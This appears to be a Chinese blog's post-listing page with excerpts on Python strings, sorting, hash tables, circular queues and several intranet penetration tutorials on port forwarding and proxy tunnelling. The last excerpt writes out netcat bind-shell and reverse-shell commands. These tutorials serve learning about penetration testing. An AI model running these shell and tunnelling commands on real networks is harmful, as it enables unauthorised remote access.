上一页 1 ··· 102 103 104 105 106 107 108 109 110 ··· 273 下一页
摘要: 你所不知道的Python | 字符串连接的秘密 ​ from:https://zhuanlan.zhihu.com/p/38632822 字符串连接,就是将2个或以上的字符串合并成一个,看上去连接字符串是一个非常基础的小问题,但是在Python中,我们可以用多种方式实现字符串的连接,稍有不慎就有可能 阅读全文
posted @ 2020-03-25 15:07 bonelee 阅读(991) 评论(0) 推荐(0)
摘要: 十大经典排序算法(动图演示) 0、算法概述 0.1 算法分类 十种常见排序算法可以分为两大类: 比较类排序:通过比较来决定元素间的相对次序,由于其时间复杂度不能突破O(nlogn),因此也称为非线性时间比较类排序。 非比较类排序:不通过比较来决定元素间的相对次序,它可以突破基于比较排序的时间下界,以 阅读全文
posted @ 2020-03-25 15:04 bonelee 阅读(670) 评论(0) 推荐(0)
摘要: HashTable-散列表/哈希表 是根据关键字(key)而直接访问在内存存储位置的数据结构。 它通过一个关键值的函数将所需的数据映射到表中的位置来访问数据,这个映射函数叫做散列(哈希)函数,存放记录的数组叫做散列表。 构造哈希表的几种方法1.直接定址法(取关键字的某个线性函数为哈希地址)2.除留余 阅读全文
posted @ 2020-03-25 14:55 bonelee 阅读(1466) 评论(0) 推荐(0)
摘要: 转自https://blog.csdn.net/weixin_42229896/article/details/80736517 假脱机的概念 SPOOLing技术:利用高速共享设备(通常是磁鼓或者是磁带)将低速的独享设备模拟为高速的共享设备,这样,从逻辑上讲,计算机系统为每一个用户都分配了一台独立 阅读全文
posted @ 2020-03-25 14:35 bonelee 阅读(1083) 评论(0) 推荐(0)
摘要: 622. 设计循环队列 难度中等89收藏分享切换为英文关注反馈 设计你的循环队列实现。 循环队列是一种线性数据结构,其操作表现基于 FIFO(先进先出)原则并且队尾被连接在队首之后以形成一个循环。它也被称为“环形缓冲器”。 循环队列的一个好处是我们可以利用这个队列之前用过的空间。在一个普通队列里,一 阅读全文
posted @ 2020-03-22 13:09 bonelee 阅读(504) 评论(0) 推荐(0)
摘要: 使用ew完成多场景下内网代理穿透 日期 2019-04-20 基础,内网渗透,代理穿透,端口转发 作者 amm907 共0评论 0x01 需求 当渗透进行到内网,常需要将流量代理到内网进行进一步扩展如: 端口扫描 端口转发 访问内网web服务 …… 0x02 场景 以下模拟一个使用场景。 1、环境配 阅读全文
posted @ 2020-03-17 15:43 bonelee 阅读(3375) 评论(0) 推荐(0)
摘要: 内网渗透中的端口转发 需要知道,在渗透的整个流程中,根据web应用或者开放的端口进行渗透,获取webshell只是渗透这门艺术的一小部分,在真实的错综复杂的企业环境中进行内网渗透,其实水很深,涉及内网穿透,端口转发,域渗透,提权等一系列的难题。所以这篇文章对内网渗透学习进行一些记录。在这过程中参考了 阅读全文
posted @ 2020-03-17 15:34 bonelee 阅读(8289) 评论(0) 推荐(2)
摘要: 内网渗透常见端口转发方式 Feb 2, 2018 本篇文章主要是总结一下常见端口转发姿势。 0x01 前言 网络拓扑 0x02 lcx lcx 参数 端口映射 - 无法访问内网情况下 端口转发 - 能够访问内网某台主机 0x03 netsh 说明 安装IPV6 转发 删除转发记录 查看转发记录 0x 阅读全文
posted @ 2020-03-17 15:32 bonelee 阅读(1283) 评论(0) 推荐(0)
摘要: 内网渗透之端口转发、映射、代理 裁决 / 2019-09-18 09:22:14 / 浏览数 13714 渗透测试 渗透测试顶(7) 踩(0) 端口转发&端口映射 0x01 什么是端口转发 端口转发(Port forwarding),有时被叫做隧道,是安全壳(SSH)为网络安全通信使用的一种方法。端 阅读全文
posted @ 2020-03-17 09:48 bonelee 阅读(4369) 评论(0) 推荐(0)
摘要: 内网渗透的边界场景分析+内网代理整理 先从nc开始理解正向代理和反向代理: 1、正向连接 受害者主机执行 nc -e -t /bin/bash -lvp 7777 攻击者执行 nc -t 192.168.16.X 7777 2、反向连接 受害者主机执行 nc -t -e cmd.exe 192.16 阅读全文
posted @ 2020-03-16 22:34 bonelee 阅读(3637) 评论(0) 推荐(0)
上一页 1 ··· 102 103 104 105 106 107 108 109 110 ··· 273 下一页